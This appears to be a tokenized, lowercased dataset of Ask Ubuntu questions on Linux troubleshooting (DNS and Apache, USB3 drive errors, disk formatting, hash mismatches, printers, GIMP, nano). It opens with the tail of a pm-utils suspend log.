/usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : sessions still open , not unmounting sessions still open , not unmounting sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . thu aug 15 13:13:11 eest 2013 : performing suspend initial commandline parameters : πεμ 15 αύγ 2013 07:02:29 μμ eest : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux orestis-vaio 3.5.0-37-generic # 58~precise1-ubuntu smp wed jul 10 17:48:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux module size used by btusb 22432 0 joydev 17694 0 rfcomm 47562 0 bnep 18240 2 parport_pc 32867 0 bluetooth 211860 14 btusb , rfcomm , bnep ppdev 17114 0 arc4 12530 2 binfmt_misc 17541 1 coretemp 13642 0 xt_hl 12522 6 ip6t_rt 12559 3 nf_conntrack_ipv6 14107 7 nf_defrag_ipv6 13413 1 nf_conntrack_ipv6 ipt_reject 12577 1 psmouse 102506 0 xt_log 17454 9 xt_limit 12712 12 xt_tcpudp 12604 18 xt_addrtype 12714 4 microcode 23030 0 uvcvideo 78117 0 xt_state 12579 14 videobuf2_core 33025 1 uvcvideo videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc ip6table_filter 12816 1 ip6_tables 27686 2 ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12666 0 nf_conntrack_broadcast 12590 1 nf_conntrack_netbios_ns nf_nat_ftp 12705 0 nf_nat 25646 1 nf_nat_ftp nf_conntrack_ipv4 14531 9 nf_nat nf_defrag_ipv4 12730 1 nf_conntrack_ipv4 serio_raw 13216 0 nf_conntrack_ftp 13453 1 nf_nat_ftp nf_conntrack 83300 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12811 1 snd_hda_codec_hdmi 32476 1 ip_tables 27474 1 iptable_filter x_tables 29892 12 xt_hl , ip6t_rt , ipt_reject , xt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables snd_seq_midi 13325 0 iwlwifi 399614 0 mac80211 555272 1 iwlwifi snd_hda_codec_realtek 79855 1 mac_hid 13254 0 sony_laptop 54939 0 r592 18145 0 snd_rawmidi 30750 1 snd_seq_midi memstick 16606 1 r592 cfg80211 208382 2 iwlwifi , mac80211 lpc_ich 17145 0 snd_seq_midi_event 14900 1 snd_seq_midi snd_hda_intel 34063 5 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec lp 17800 0 snd_timer 29990 2 snd_seq , snd_pcm snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd 83674 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_rawmidi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_seq , snd_pcm , snd_timer , snd_seq_device soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm parport 46563 3 parport_pc , ppdev , lp radeon 917945 3 firewire_ohci 41034 0 ttm 88495 1 radeon sdhci_pci 18749 0 drm_kms_helper 49259 1 radeon firewire_core 64697 1 firewire_ohci video 19653 0 crc_itu_t 12708 1 firewire_core drm 290595 5 radeon , ttm , drm_kms_helper sdhci 33145 1 sdhci_pci i2c_algo_bit 13565 1 radeon sky2 59074 0 ahci 25869 1 libahci 27338 1 ahci total used free shared buffers cached mem : 4015940 1217940 2798000 0 109564 595600 -/+ buffers/cache : 512776 3503164 swap : 0 0 0 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : sessions still open , not unmounting sessions still open , not unmounting sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting welcome to pulseaudio ! use `` help '' for usage information . > > > > > > sessions still open , not unmounting /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : selected interface 'wlan0' ok /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . πεμ 15 αύγ 2013 07:02:30 μμ eest : performing suspend
332909	ca n't resolve dns	i 've setup a lamp server with ubuntu . it 's a dedicated server hosted by online.net . now , i 've purchased a domain name and i 've created a a registar mapping to my server 's ip address http : //88.191.157.10/ . if you browse to this ip address , this will reach my website ( the 404 is expected ) . however , if you browse to the website using the dns http : //samuel-berthelot.fr then you end up on a parking page of online.net ... i did a dig on the dns and it returns the correct ip address . so i 'm not sure what i 'm missing here ... note : that if on my server i browse to the website using the domain name , then it works . so it must be something simple i 've missed . edit : since it seems to come from my apache web config , here it is : < virtualhost 88.191.157.10:80 > servername samuel-berthelot.fr serveralias www.samuel-berthelot.fr serveradmin graphicsxp @ gmail.com documentroot /var/www/ephotograph/web directoryindex app.php < directory `` /var/www/ephotograph/web '' > allowoverride all allow from all < /directory > < ifmodule mod_rewrite.c > rewriteengine on rewritecond % { request_filename } ! -f rewriterule ^ ( . * ) $ app.php [ qsa , l ] < /ifmodule >
332911	floating ip address	what does 29 means in this floating ip range 192.168.1.0/29 ? i know it will give 6 usable floating ip but how can i know the what number other than 29 can i use to give me more range for my floating ip ?
332912	how can i recover files from an xfs file system without spending money on software ?	i have an old iomega nas , that has stopped working . the drive is still good , i just need to recover the files . both of my ubuntu machines recognize the drives in the disks utility , but i ca n't do anything with them beyond formatting . i have tried kde partition manager with no luck , and i have sampled ufs explorer on windows . ufs explorer is great , but i am poor and i ca n't afford to buy the license . does ubuntu have some open source software that will do what ufs explorer does ?
332916	how to format an external drive to ext4 in ubuntu 13.04	in ubuntu 13.04 the disk utility has been renamed to disks and has a completely new interface . using this new version of disks i want to format my external hard drive to ext4 , but the answers to this question already posted refer to an old version of disks . i only have two options when formatting , neither of which is ext4 : can anyone tell me how to do this ?
332923	why i could n't connect to internet using zte made reliance in hsd mode ?	i am trying to connect to the internet with a reliance netconnect+ made by zte . the manufacturer provided a driver disk to install it , but i could n't make the install programme work , and whenever i tried i see that `` this driver is not in good condition '' and i still could n't connect in hsd mode . i am not having any problem while connecting using 1x or hybrid mode . please can someone help me in this ?
332927	troubles connecting usb3 drive	i have two distinct pc with the same issue . if i connect an external usb3 hdd to the front panel i get a lot of issues . sometimes it is recognized but i get errors transferring files , other times it is not recognized at all . last time i tried dmesg looked like this : [ 52306.980676 ] usb 4-5 : new superspeed usb device number 3 using xhci_hcd [ 52311.990308 ] usb 4-5 : device descriptor read/all , error -110 [ 52312.046207 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52312.570682 ] usb 4-5 : new superspeed usb device number 5 using xhci_hcd [ 52312.596010 ] usb 4-5 : device descriptor read/8 , error -71 [ 52312.697334 ] usb 4-5 : new superspeed usb device number 5 using xhci_hcd [ 52312.723848 ] usb 4-5 : device descriptor read/8 , error -71 [ 52312.881146 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52313.140860 ] usb 4-5 : new superspeed usb device number 7 using xhci_hcd [ 52318.150455 ] usb 4-5 : unable to get bos descriptor set [ 52323.144147 ] usb 4-5 : unable to read config index 0 descriptor/start : -110 [ 52323.144157 ] usb 4-5 : ca n't read configurations , error -110 [ 52323.200064 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52323.728556 ] usb 4-5 : new superspeed usb device number 9 using xhci_hcd [ 52323.753871 ] usb 4-5 : device descriptor read/8 , error -71 [ 52323.855183 ] usb 4-5 : new superspeed usb device number 9 using xhci_hcd [ 52323.881460 ] usb 4-5 : device descriptor read/8 , error -71 [ 52324.038995 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52324.302707 ] usb 4-5 : new superspeed usb device number 11 using xhci_hcd [ 52329.312284 ] usb 4-5 : unable to read config index 0 descriptor/all [ 52329.312295 ] usb 4-5 : ca n't read configurations , error -110 [ 52329.368238 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52329.900736 ] usb 4-5 : new superspeed usb device number 13 using xhci_hcd [ 52329.926051 ] usb 4-5 : device descriptor read/8 , error -71 [ 52330.027357 ] usb 4-5 : new superspeed usb device number 13 using xhci_hcd [ 52330.053635 ] usb 4-5 : device descriptor read/8 , error -71 [ 52330.211170 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52330.470883 ] usb 4-5 : new superspeed usb device number 15 using xhci_hcd [ 52330.487587 ] usb 4-5 : new usb device found , idvendor=04e8 , idproduct=61b6 [ 52330.487596 ] usb 4-5 : new usb device strings : mfr=1 , product=11 , serialnumber=3 [ 52330.487601 ] usb 4-5 : product : samsung m3 portable [ 52330.487605 ] usb 4-5 : manufacturer : jmicron [ 52330.487608 ] usb 4-5 : serialnumber : 00000000011e3877 [ 52330.488186 ] usb 4-5 : enable of device-initiated u1 failed . [ 52330.488344 ] usb 4-5 : enable of device-initiated u2 failed . [ 52330.488706 ] scsi7 : usb-storage 4-5:1.0 [ 52330.488916 ] usb 4-5 : enable of device-initiated u1 failed . [ 52330.489075 ] usb 4-5 : enable of device-initiated u2 failed . [ 52331.491780 ] scsi 7:0:0:0 : direct-access samsung m3 portable 3 pq : 0 ansi : 6 [ 52331.493112 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 52331.493372 ] sd 7:0:0:0 : [ sdc ] 1953504688 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 52331.493652 ] sd 7:0:0:0 : [ sdc ] write protect is off [ 52331.493663 ] sd 7:0:0:0 : [ sdc ] mode sense : 27 00 00 00 [ 52331.493956 ] sd 7:0:0:0 : [ sdc ] no caching mode page present [ 52331.493965 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 52331.495097 ] sd 7:0:0:0 : [ sdc ] no caching mode page present [ 52331.495107 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 52331.989039 ] usb 4-5 : reset superspeed usb device number 15 using xhci_hcd [ 52332.005225 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22000 [ 52332.005227 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22040 [ 52332.005610 ] usb 4-5 : enable of device-initiated u1 failed . [ 52332.005769 ] usb 4-5 : enable of device-initiated u2 failed . [ 52332.132856 ] usb 4-5 : reset superspeed usb device number 15 using xhci_hcd [ 52332.149042 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22000 [ 52332.149044 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22040 [ 52332.149425 ] usb 4-5 : enable of device-initiated u1 failed . [ 52332.149584 ] usb 4-5 : enable of device-initiated u2 failed . [ 52332.276676 ] usb 4-5 : reset superspeed usb device number 15 using xhci_hcd [ 52337.286185 ] usb 4-5 : device descriptor read/all , error -110 [ 52337.374047 ] usb 4-5 : usb disconnect , device number 15 [ 52337.381979 ] sd 7:0:0:0 : [ sdc ] unhandled error code [ 52337.381981 ] sd 7:0:0:0 : [ sdc ] [ 52337.381982 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 52337.381983 ] sd 7:0:0:0 : [ sdc ] cdb : [ 52337.381984 ] read ( 10 ) : 28 00 00 00 00 00 00 00 08 00 [ 52337.381987 ] end_request : i/o error , dev sdc , sector 0 [ 52337.381989 ] buffer i/o error on device sdc , logical block 0 [ 52337.382031 ] ldm_validate_partition_table ( ) : disk read failed . [ 52337.382039 ] dev sdc : unable to read rdb block 0 [ 52337.382051 ] sdc : unable to read partition table [ 52337.382229 ] sd 7:0:0:0 : [ sdc ] read capacity failed [ 52337.382240 ] sd 7:0:0:0 : [ sdc ] [ 52337.382241 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 52337.382242 ] sd 7:0:0:0 : [ sdc ] sense not available . [ 52337.382291 ] sd 7:0:0:0 : [ sdc ] asking for cache data failed [ 52337.382293 ] sd 7:0:0:0 : [ sdc ] assuming drive cache : write through [ 52337.382294 ] sd 7:0:0:0 : [ sdc ] attached scsi disk [ 52337.382539 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22000 [ 52337.382542 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22040 [ 52337.874545 ] usb 4-5 : new superspeed usb device number 16 using xhci_hcd [ 52337.899698 ] usb 4-5 : device descriptor read/8 , error -71 [ 52338.001242 ] usb 4-5 : new superspeed usb device number 16 using xhci_hcd [ 52338.027784 ] usb 4-5 : device descriptor read/8 , error -71 [ 52338.185055 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52338.444768 ] usb 4-5 : new superspeed usb device number 18 using xhci_hcd [ 52338.461340 ] usb 4-5 : new usb device found , idvendor=04e8 , idproduct=61b6 [ 52338.461349 ] usb 4-5 : new usb device strings : mfr=1 , product=11 , serialnumber=3 [ 52338.461354 ] usb 4-5 : product : samsung m3 portable [ 52338.461358 ] usb 4-5 : manufacturer : jmicron [ 52338.461361 ] usb 4-5 : serialnumber : 00000000011e3877 [ 52338.461932 ] usb 4-5 : enable of device-initiated u1 failed . [ 52338.462089 ] usb 4-5 : enable of device-initiated u2 failed . [ 52338.462533 ] scsi8 : usb-storage 4-5:1.0 [ 52338.462739 ] usb 4-5 : enable of device-initiated u1 failed . [ 52338.462898 ] usb 4-5 : enable of device-initiated u2 failed . [ 52339.465490 ] scsi 8:0:0:0 : direct-access samsung m3 portable 3 pq : 0 ansi : 6 [ 52339.465947 ] sd 8:0:0:0 : attached scsi generic sg2 type 0 [ 52339.466121 ] sd 8:0:0:0 : [ sdc ] 1953504688 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 52339.466370 ] sd 8:0:0:0 : [ sdc ] write protect is off [ 52339.466372 ] sd 8:0:0:0 : [ sdc ] mode sense : 27 00 00 00 [ 52339.466761 ] sd 8:0:0:0 : [ sdc ] no caching mode page present [ 52339.466764 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 52339.467739 ] sd 8:0:0:0 : [ sdc ] no caching mode page present [ 52339.467751 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 52340.157069 ] sdc : sdc1 [ 52340.158022 ] sd 8:0:0:0 : [ sdc ] no caching mode page present [ 52340.158025 ] sd 8:0:0:0 : [ sdc ] assuming drive cache : write through [ 52340.158026 ] sd 8:0:0:0 : [ sdc ] attached scsi disk [ 52340.302496 ] usb 4-5 : reset superspeed usb device number 18 using xhci_hcd [ 52345.312006 ] usb 4-5 : device descriptor read/all , error -110 [ 52345.399882 ] usb 4-5 : usb disconnect , device number 18 [ 52345.403802 ] scsi 8:0:0:0 : rejecting i/o to offline device [ 52345.403807 ] scsi 8:0:0:0 : [ sdc ] killing request [ 52345.403816 ] scsi 8:0:0:0 : [ sdc ] unhandled error code [ 52345.403818 ] scsi 8:0:0:0 : [ sdc ] [ 52345.403821 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 52345.403823 ] scsi 8:0:0:0 : [ sdc ] cdb : [ 52345.403824 ] read ( 10 ) : 28 00 74 70 1d 00 00 00 08 00 [ 52345.403838 ] end_request : i/o error , dev sdc , sector 1953504512 [ 52345.403840 ] buffer i/o error on device sdc , logical block 244188064 [ 52345.403848 ] buffer i/o error on device sdc , logical block 244188064 [ 52345.403874 ] buffer i/o error on device sdc , logical block 244188084 [ 52345.403875 ] buffer i/o error on device sdc , logical block 244188084 [ 52345.403877 ] buffer i/o error on device sdc , logical block 0 [ 52345.403878 ] buffer i/o error on device sdc , logical block 0 [ 52345.403881 ] buffer i/o error on device sdc , logical block 1 [ 52345.403885 ] buffer i/o error on device sdc , logical block 244188085 [ 52345.403908 ] buffer i/o error on device sdc , logical block 1 [ 52345.415902 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22800 [ 52345.415904 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22840 [ 52345.920395 ] usb 4-5 : new superspeed usb device number 19 using xhci_hcd [ 52345.945502 ] usb 4-5 : device descriptor read/8 , error -71 [ 52346.047036 ] usb 4-5 : new superspeed usb device number 19 using xhci_hcd [ 52346.073340 ] usb 4-5 : device descriptor read/8 , error -71 [ 52346.230852 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52346.490520 ] usb 4-5 : new superspeed usb device number 21 using xhci_hcd [ 52351.500177 ] usb 4-5 : device descriptor read/all , error -110 [ 52351.556098 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52352.088558 ] usb 4-5 : new superspeed usb device number 23 using xhci_hcd [ 52352.113686 ] usb 4-5 : device descriptor read/8 , error -71 [ 52352.215215 ] usb 4-5 : new superspeed usb device number 23 using xhci_hcd [ 52352.241524 ] usb 4-5 : device descriptor read/8 , error -71 [ 52352.399026 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52352.658743 ] usb 4-5 : new superspeed usb device number 25 using xhci_hcd [ 52352.685209 ] usb 4-5 : unable to get bos descriptor [ 52357.680349 ] usb 4-5 : unable to read config index 0 descriptor/start : -110 [ 52357.680358 ] usb 4-5 : ca n't read configurations , error -110 [ 52357.736261 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52358.268725 ] usb 4-5 : new superspeed usb device number 27 using xhci_hcd [ 52358.293854 ] usb 4-5 : device descriptor read/8 , error -71 [ 52358.395378 ] usb 4-5 : new superspeed usb device number 27 using xhci_hcd [ 52358.421692 ] usb 4-5 : device descriptor read/8 , error -71 [ 52358.579189 ] hub 4-0:1.0 : unable to enumerate usb device on port 5 [ 52358.838906 ] usb 4-5 : new superspeed usb device number 29 using xhci_hcd [ 52358.855513 ] usb 4-5 : new usb device found , idvendor=04e8 , idproduct=61b6 [ 52358.855521 ] usb 4-5 : new usb device strings : mfr=1 , product=11 , serialnumber=3 [ 52358.855526 ] usb 4-5 : product : samsung m3 portable [ 52358.855530 ] usb 4-5 : manufacturer : jmicron [ 52358.855534 ] usb 4-5 : serialnumber : 00000000011e3877 [ 52358.856125 ] usb 4-5 : enable of device-initiated u1 failed . [ 52358.856283 ] usb 4-5 : enable of device-initiated u2 failed . [ 52358.856703 ] scsi9 : usb-storage 4-5:1.0 [ 52358.856917 ] usb 4-5 : enable of device-initiated u1 failed . [ 52358.857075 ] usb 4-5 : enable of device-initiated u2 failed . [ 52359.859832 ] scsi 9:0:0:0 : direct-access samsung m3 portable 3 pq : 0 ansi : 6 [ 52359.861297 ] sd 9:0:0:0 : attached scsi generic sg2 type 0 [ 52359.861480 ] sd 9:0:0:0 : [ sdc ] 1953504688 512-byte logical blocks : ( 1.00 tb/931 gib ) [ 52359.861755 ] sd 9:0:0:0 : [ sdc ] write protect is off [ 52359.861762 ] sd 9:0:0:0 : [ sdc ] mode sense : 27 00 00 00 [ 52359.862021 ] sd 9:0:0:0 : [ sdc ] no caching mode page present [ 52359.862027 ] sd 9:0:0:0 : [ sdc ] assuming drive cache : write through [ 52359.863097 ] sd 9:0:0:0 : [ sdc ] no caching mode page present [ 52359.863107 ] sd 9:0:0:0 : [ sdc ] assuming drive cache : write through [ 52360.255973 ] sdc : sdc1 [ 52360.256976 ] sd 9:0:0:0 : [ sdc ] no caching mode page present [ 52360.256979 ] sd 9:0:0:0 : [ sdc ] assuming drive cache : write through [ 52360.256981 ] sd 9:0:0:0 : [ sdc ] attached scsi disk [ 52360.401006 ] usb 4-5 : reset superspeed usb device number 29 using xhci_hcd [ 52360.424127 ] usb 4-5 : device firmware changed [ 52360.424154 ] usb 4-5 : usb disconnect , device number 29 [ 52360.424814 ] scsi 9:0:0:0 : rejecting i/o to offline device [ 52360.424816 ] scsi 9:0:0:0 : [ sdc ] killing request [ 52360.424824 ] scsi 9:0:0:0 : [ sdc ] unhandled error code [ 52360.424826 ] scsi 9:0:0:0 : [ sdc ] [ 52360.424827 ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 52360.424829 ] scsi 9:0:0:0 : [ sdc ] cdb : [ 52360.424830 ] read ( 10 ) : 28 00 74 70 1d 00 00 00 08 00 [ 52360.424834 ] end_request : i/o error , dev sdc , sector 1953504512 [ 52360.424835 ] quiet_error : 128 callbacks suppressed [ 52360.424837 ] buffer i/o error on device sdc , logical block 244188064 [ 52360.424843 ] buffer i/o error on device sdc , logical block 244188064 [ 52360.424854 ] buffer i/o error on device sdc , logical block 244188084 [ 52360.424856 ] buffer i/o error on device sdc , logical block 244188084 [ 52360.424859 ] buffer i/o error on device sdc , logical block 0 [ 52360.424860 ] buffer i/o error on device sdc , logical block 0 [ 52360.424863 ] buffer i/o error on device sdc , logical block 1 [ 52360.424866 ] buffer i/o error on device sdc , logical block 244188085 [ 52360.424889 ] buffer i/o error on device sdc , logical block 1 [ 52360.424891 ] buffer i/o error on device sdc , logical block 1 [ 52360.441058 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22c80 [ 52360.441064 ] xhci_hcd 0000:00:14.0 : xhci xhci_drop_endpoint called with disabled ep ffff88039ef22cc0 if i connect the drive to a rear usb port everything seems to work as expected ( although not at rocket speed ) . other info : the two pcs have different motherboards : asus rog max v gene and asrock h87m pro4 the external drive is not damaged it works on windows ( both on front and back ports ) the drive is a samsung m3 portable 1tb model hx-m101tcb/g
332931	mathematica .m file can not open	i add some new .m file to /usr/local/wolfram/mathematica/9.0/addons/packages/ and then call for it in mathematica , but failed with the message get : :noopen : `` can not open \ ! \ ( \ '' qdensity.m\ '' \ ) . '' . what should i do to make it work ?
332932	regarding ubuntu12.04 instalation on windows 7 64-bit os	when i try to install ubuntu 12.04 by dvd , i insert the dvd and select the booting option as dvd . next i press the enter key to install . after few second my screen goes blank like when the computer is turned off . during this blank screen there are quiet sounds of disk writing for about 15 to 20 minutes from the dvd writer , after this the sound stops , my computer is on but the screen remains blank . please help me install ubuntu on my system . my system configuration is -- hp pavilion g4 , ram 4 gb , hard disk 640 gb , processor intel i5 , operating system is windows 7 home basic 64 bit .
332935	disk read error . click ctrl + alt + del to restart . windows 7 , ubuntu dual boot	i have windows 7 on my system and recently i installed ubuntu 12.10 as dual boot , both worked fine . one day i created some shortcuts to windows folders in ubuntu . after that , when i am logging in to ubuntu . i get the following error message and i am unable to boot to ubuntu . please can you help me find my bootsector info ? http : //paste.ubuntu.com/5988981/
332940	sha256sum/md5sum gives different results for big files ( ext4/full disk encryption )	yesterday i reinstalled ubuntu 13.04 64-bit on my computer ( 4gb ram ) , and for the first time i decided to use full disk encryption ( all default settings ) . today while running backups my computer crashed twice . now i continued to work on my backups and when checking the hash of a backup of mine i found out that sha256sum showed a wrong result for a big file . i skimmed over /var/log/syslog and i did not find any error , and the disk utility also says that the disk is ok . i tried to reproduce that error , and for small files i did n't have this problem , but for big files i do : $ dd if=/dev/zero of=zeroes bs=1m count=4000 & & sha256sum zeroes & & sha256sum zeroes 4000+0 records in 4000+0 records out 4194304000 bytes ( 4,2 gb ) copied , 54,0345 s , 77,6 mb/s ad6637bd22568145039a053da5cbf4c31d3eda5ef95c29646fa66b0cacd15a8c zeroes 8ea0d0c9ad97de182335e98045a1f197456ceee782fa6e801fd3e68bea4d35d3 zeroes $ md5sum zeroes & & md5sum zeroes 8097877e1c991721dae7ffe228ae2f5a zeroes fbd1e7fcd3861446310c87abf72066bf zeroes this is really bad if i ca n't rely on any of my data , so i would really appreciate if somebody could help me out finding out what the problem could be .
332949	what command do i use to find physical disk size ?	i use df -h to see formatted size , but how to see actual ? i believe one of my disks is 3tb but formatted as 2tb but not sure which . ( they 're remote so i ca n't look ! )
332952	how do i find newly installed applications in ubuntu 13.04	i have installed google chromium for ubuntu , but i can not find it . it 's not in the launcher or in installed applications .
332956	how can i correct for a slow scanning document feeder ?	we 've got a hp all-in-one officejet and i find that the document feeder on it is a bit slow , so all the scans come out a bit stretched . everything we feed into this is a4 which should have an aspect of 1.4142 but actually comes out at 1.64 . given a multi-page pdf , does anybody know something that i can process it with that can tick the following boxes : shorten the page height as required . preserve the quality ( some will be lost , but most should remain ) keep the format as a pdf . i 'm trying convert ( part of imagemagick ) but i 'm struggling to get it to do either of the first two .
332957	hp laserjet 1000 printer installation poblem in ubuntu 13.04 on hp g60-533cl notebook	how can i install an hp laserjet 1000 printer on my hp g60-533cl notebook on ubuntu 13.04 ?
332959	gimp does n't show tools window	i have installed gimp 2.8.4 on ubuntu 13.04 ( via standard repositories ) . my problem is i do n't see tools window ( the one i used to show/hide with the tab key ) . how can i make tools window appear ?
332961	undo functionality in nano	i use the commmand line text editor nano . how do i undo an action while editing text ? for example : i typed some text and then changed my mind . now i want to return to previous state . how ?
